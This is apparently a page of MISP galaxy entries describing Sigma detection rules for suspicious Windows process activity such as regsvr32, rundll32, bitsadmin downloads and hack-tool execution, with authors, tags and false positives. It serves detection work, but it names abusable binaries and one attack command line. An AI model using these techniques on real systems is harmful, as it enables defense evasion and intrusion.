Scripting/CommandLine Process Spawned Regsvr32

Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.

Internal MISP references

UUID ab37a6ec-6068-432b-a64e-2c7bf95b1d22 which can be used as unique global reference for Scripting/CommandLine Process Spawned Regsvr32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-05-26
falsepositive ['Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary', 'Some legitimate Windows services']
filename proc_creation_win_regsvr32_susp_parent.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Rundll32 InstallScreenSaver Execution

An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver

Internal MISP references

UUID 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 which can be used as unique global reference for Rundll32 InstallScreenSaver Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
creation_date 2022-04-28
falsepositive ['Legitimate installation of a new screensaver']
filename proc_creation_win_rundll32_installscreensaver.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.t1218.011', 'attack.defense-evasion']
Related clusters

To see the related clusters, click here.

Arbitrary File Download Via ConfigSecurityPolicy.EXE

Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers in order to upload or download files.

Internal MISP references

UUID 1f0f6176-6482-4027-b151-00071af39d7e which can be used as unique global reference for Arbitrary File Download Via ConfigSecurityPolicy.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021-11-26
falsepositive ['Unknown']
filename proc_creation_win_configsecuritypolicy_download_file.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567']
Related clusters

To see the related clusters, click here.

Suspicious Download From Direct IP Via Bitsadmin

Detects usage of bitsadmin downloading a file using an URL that contains an IP

Internal MISP references

UUID 99c840f2-2012-46fd-9141-c761987550ef which can be used as unique global reference for Suspicious Download From Direct IP Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-06-28
falsepositive ['Unknown']
filename proc_creation_win_bitsadmin_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

WMI Backdoor Exchange Transport Agent

Detects a WMI backdoor in Exchange Transport Agents via WMI event filters

Internal MISP references

UUID 797011dc-44f4-4e6f-9f10-a8ceefbe566b which can be used as unique global reference for WMI Backdoor Exchange Transport Agent in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019-10-11
falsepositive ['Unknown']
filename proc_creation_win_wmi_backdoor_exchange_transport_agent.yml
level critical
logsource.category process_creation
logsource.product windows
tags ['attack.privilege-escalation', 'attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Suspicious Workstation Locking via Rundll32

Detects a suspicious call to the user32.dll function that locks the user workstation

Internal MISP references

UUID 3b5b0213-0460-4e3f-8937-3abf98ff7dcc which can be used as unique global reference for Suspicious Workstation Locking via Rundll32 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-06-04
falsepositive ['Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option']
filename proc_creation_win_rundll32_user32_dll.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion']

Suspicious Download From File-Sharing Website Via Bitsadmin

Detects usage of bitsadmin downloading a file from a suspicious domain

Internal MISP references

UUID 8518ed3d-f7c9-4601-a26c-f361a4256a0c which can be used as unique global reference for Suspicious Download From File-Sharing Website Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-06-28
falsepositive ['Some legitimate apps use this, but limited.']
filename proc_creation_win_bitsadmin_download_file_sharing_domains.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.persistence', 'attack.t1197', 'attack.s0190', 'attack.t1036.003']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension

Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension.

Internal MISP references

UUID e9f8f8cc-07cc-4e81-b724-f387db9175e4 which can be used as unique global reference for Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023-02-13
falsepositive ['Unknown']
filename proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1218.009']
Related clusters

To see the related clusters, click here.

JScript Compiler Execution

Detects the execution of the "jsc.exe" (JScript Compiler). Attacker might abuse this in order to compile JScript files on the fly and bypassing application whitelisting.

Internal MISP references

UUID 52788a70-f1da-40dd-8fbd-73b5865d6568 which can be used as unique global reference for JScript Compiler Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022-05-02
falsepositive ['Legitimate use to compile JScript by developers.']
filename proc_creation_win_jsc_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Share And Session Enumeration Using Net.EXE

Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.

Internal MISP references

UUID 62510e69-616b-4078-b371-847da438cc03 which can be used as unique global reference for Share And Session Enumeration Using Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Endgame, JHasenbusch (ported for oscd.community)
creation_date 2018-10-30
falsepositive ['Legitimate use of net.exe utility by legitimate user']
filename proc_creation_win_net_view_share_and_sessions_enum.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1018']
Related clusters

To see the related clusters, click here.

Network Reconnaissance Activity

Detects a set of suspicious network related commands often used in recon stages

Internal MISP references

UUID e6313acd-208c-44fc-a0ff-db85d572e90e which can be used as unique global reference for Network Reconnaissance Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022-02-07
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_nslookup_domain_discovery.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087', 'attack.t1082', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

Suspicious Microsoft OneNote Child Process

Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.

Internal MISP references

UUID c27515df-97a9-4162-8a60-dc0eeb51b775 which can be used as unique global reference for Suspicious Microsoft OneNote Child Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
creation_date 2022-10-21
falsepositive ['File located in the AppData folder with trusted signature']
filename proc_creation_win_office_onenote_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1566', 'attack.t1566.001', 'attack.initial-access']
Related clusters

To see the related clusters, click here.

Always Install Elevated Windows Installer

Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege

Internal MISP references

UUID cd951fdc-4b2f-47f5-ba99-a33bf61e3770 which can be used as unique global reference for Always Install Elevated Windows Installer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
creation_date 2020-10-13
falsepositive ['System administrator usage', 'Anti virus products', 'WindowsApps located in "C:\Program Files\WindowsApps\"']
filename proc_creation_win_susp_always_install_elevated_windows_installer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Regedit as Trusted Installer

Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe

Internal MISP references

UUID 883835a7-df45-43e4-bf1d-4268768afda4 which can be used as unique global reference for Regedit as Trusted Installer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021-05-27
falsepositive ['Unlikely']
filename proc_creation_win_regedit_trustedinstaller.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1548']
Related clusters

To see the related clusters, click here.

HackTool - SOAPHound Execution

Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.

Internal MISP references

UUID e92a4287-e072-4a40-9739-370c106bb750 which can be used as unique global reference for HackTool - SOAPHound Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @kostastsale
creation_date 2024-01-26
falsepositive ['Unknown']
filename proc_creation_win_hktl_soaphound_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1087']
Related clusters

To see the related clusters, click here.

Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp

Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.

Internal MISP references

UUID 551d9c1f-816c-445b-a7a6-7a3864720d60 which can be used as unique global reference for Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aaron Stratton
creation_date 2023-11-13
falsepositive ['Unknown']
filename proc_creation_win_office_excel_dcom_lateral_movement.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1021.003', 'attack.lateral-movement']
Related clusters

To see the related clusters, click here.

DLL Loaded via CertOC.EXE

Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.

Internal MISP references

UUID 242301bc-f92f-4476-8718-78004a6efd9f which can be used as unique global reference for DLL Loaded via CertOC.EXE in MISP communities and other software using the MISP galaxy

External references